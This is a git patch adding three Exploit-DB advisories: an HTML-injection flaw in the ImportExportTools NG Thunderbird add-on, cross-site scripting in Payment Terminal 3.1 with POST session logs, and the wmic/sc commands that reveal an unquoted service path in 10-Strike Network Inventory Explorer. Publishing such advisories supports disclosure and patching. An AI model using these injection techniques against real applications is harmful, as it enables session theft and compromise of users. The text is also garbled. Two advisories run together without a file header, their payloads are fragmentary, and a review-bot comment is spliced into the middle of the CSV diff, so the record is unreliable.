From 3e60115da85207071d1188443906085a049f35ad Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 6 Nov 2021 05:02:14 +0000
Subject: [PATCH] DB: 2021-11-06
3 changes to exploits/shellcodes
10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
ImportExportTools NG 10.0.4 - HTML Injection
---
 exploits/multiple/webapps/50496.txt | 194 ++++++++++++++++++++
 exploits/php/webapps/50495.txt | 262 ++++++++++++++++++++++++++++
 exploits/windows/local/50494.txt | 32 ++++
 files_exploits.csv | 3 +
 4 files changed, 491 insertions(+)
 create mode 100644 exploits/multiple/webapps/50496.txt
 create mode 100644 exploits/php/webapps/50495.txt
 create mode 100644 exploits/windows/local/50494.txt
diff --git a/exploits/multiple/webapps/50496.txt b/exploits/multiple/webapps/50496.txt
new file mode 100644
index 000000000..6c324b365
--- /dev/null
+++ b/exploits/multiple/webapps/50496.txt
@@ -0,0 +1,194 @@
+# Exploit Title: ImportExportTools NG 10.0.4 - HTML Injection
+# Date: 2021-11-05
+# Exploit Author: Vulnerability Lab
+# Vendor Homepage: https://github.com/thundernest/import-export-tools-ng
+# Software Link: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/
+# Version: 10.0.4
+# Tested on: Windows
+
+Document Title:
+===============
+ImportExportTools NG 10.0.4 - HTML Injection Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2308
+
+
+Release Date:
+=============
+2021-11-05
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2308
+
+
+Common Vulnerability Scoring System:
+====================================
+4.2
+
+
+Vulnerability Class:
+====================
+Script Code Injection
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Adds tools to import/export messages and folders (NextGen).
+
+(Copy of the Homepage:https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 for mozilla thunderbird.
+
+
+Affected Product(s):
+====================
+Christopher Leidigh
+Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-10-07: Researcher Notification & Coordination (Security Researcher)
+2021-10-08: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2021-11-05: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A html inject web vulnerability has been discovered in the official ImportExportTools NG 10.0.4 for mozilla thunderbird.
+The vulnerability allows a remote attacker to inject html payloads to compromise application data or session credentials.
+
+The vulnerability is located in the html export function. Subject content on export is not sanitized like on exports in mozilla itself.
+Thus allows a remote attacker to send malicious emails with malformed a html payloads that executes on preview after a html export by
+the victim user.
+
+Vulnerable Module(s):
+[+] Export (HTML)
+
+
+Proof of Concept (PoC):
+=======================
+The web vulnerability can be exploited by remote attackers without user account and with low or medium user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install mozilla thunderbird
+2. Install ImportExportTools NG v10.0.4
+3. Use another email to write to the target inbox were the export takes place
+Note: Inject into the subject any html test payload
+4. Target user exports his content of the inbox in html were the payload executes
+5. Successful reproduce of the encode validation vulnerability!
+
+Note: We reported some years ago the same issue that was also present in keepass and kaspersky password manager on exports via html and has been successfully resolved.
+
+
+Vulnerable Source: ImportExportTools Exported HTML File
+
+
+
+Posteingang
+
+
+

Posteingang (10/07/2021)

+ +
BetreffVonAnDatumAnhang
+payload in subject "> +">%20 + + +Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack) +
+ +

Payment Information

+
+ + + onkeyup="checkFieldBack(this);" +
+ + +
+
+ +- + +

Billing Information

+
+ +"> onkeyup="checkFieldBack(this);" /> +
+ + onkeyup="checkFieldBack(this);" /> +
+ + onkeyup="checkFieldBack(this);" /> +
+ + onkeyup="checkFieldBack(this);" /> +
+
+
+--- PoC Session Logs (POST) ---
+https://autherminal.localhost:8080/authorize-terminal/
+Host: autherminal.localhost:8080
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: multipart/form-data; boundary=---------------------------317816260230756398612099882125
+Content-Length: 3270
+Origin:https://autherminal.localhost:8080
+Connection: keep-alive
+Referer:https://autherminal.localhost:8080/authorize-terminal/
+Cookie: PHPSESSID=952c12ca44f97e3b4056b731c7455a7c
+item_description=">&amount=1&fname=">
+&lname=">
+&address=">
+&city=">&country=US&state=-AU-NSW&zip=2411
+&email=">&cctype=V&ccn=4111111111111&ccname=test&exp1=11&exp2=2022&cvv=123
+&g-recaptcha-response=03AGdBq26Aocx9i3nRxaDSsQIyF0Avo9p1ozb5407foq4ywp7IEY1Y-q9g14tFgwjjkNItQMhnF
+&submit.x=50&submit.y=14&process=yes
+-
+POST: HTTP/3.0 200 OK
+content-type: text/html; charset=utf-8
+vary: Accept-Encoding
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure restriction of the input in combination with a parse or escape of the content.
+After that the onkeyup checkFieldBack should be sanitized correctly to prevent script code executions for clients.
+
+
+Security Risk:
+==============
+The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
\ No newline at end of file
diff --git a/exploits/windows/local/50494.txt b/exploits/windows/local/50494.txt
new file mode 100644
index 000000000..6e30d2221
--- /dev/null
+++ b/exploits/windows/local/50494.txt
@@ -0,0 +1,32 @@
+# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 04-11-2021
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
+# Tested Version: 9.31
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+srvInventoryWebServer srvInventoryWebServer C:\Program Files
+(x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
+Auto
+
+C:\>sc qc srvInventoryWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: srvInventoryWebServer
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\10-Strike Network
+Inventory Explorer Pro\InventoryWebServer.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : srvInventoryWebServer
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f637e720c..d67a24b40 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
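Review bot: The `sc qc` output establishes the unquoted BINARY_PATH_NAME, AUTO_START and the LocalSystem account, but the advisory never states the precondition that turns an unquoted path into a privilege-escalation issue: a low-privileged user must be able to create a file in `C:\` or in `C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\`, and default Windows ACLs deny that, so severity hinges on a check the text does not show. Adding the ACL listing of those directories (e.g. `icacls` output) after the `sc qc` block would let a reader judge whether the finding applies on a given host. A remediation line would also help triage, such as quoting the path with `sc config srvInventoryWebServer binPath= "\"C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe\""` until the vendor ships a corrected installer. The `# Date: 04-11-2021` header is day-month order while the files_exploits.csv index uses ISO dates; `# Date: 2021-11-04` would avoid the ambiguity.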
@@ -11411,6 +11411,7 @@ id,file,description,date,author,type,platform,port
 50471,exploits/windows/local/50471.py,"YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
 50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows,
 50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
+50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44593,3 +44594,5 @@ id,file,description,date,author,type,platform,port
 50491,exploits/php/webapps/50491.txt,"Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50492,exploits/php/webapps/50492.txt,"Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50493,exploits/php/webapps/50493.py,"Opencart 3 Extension TMD Vendor System - Blind SQL Injection",1970-01-01,"Muhammad Zaki Sulistya",webapps,php,
+50495,exploits/php/webapps/50495.txt,"Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
+50496,exploits/multiple/webapps/50496.txt,"ImportExportTools NG 10.0.4 - HTML Injection",1970-01-01,Vulnerability-Lab,webapps,multiple,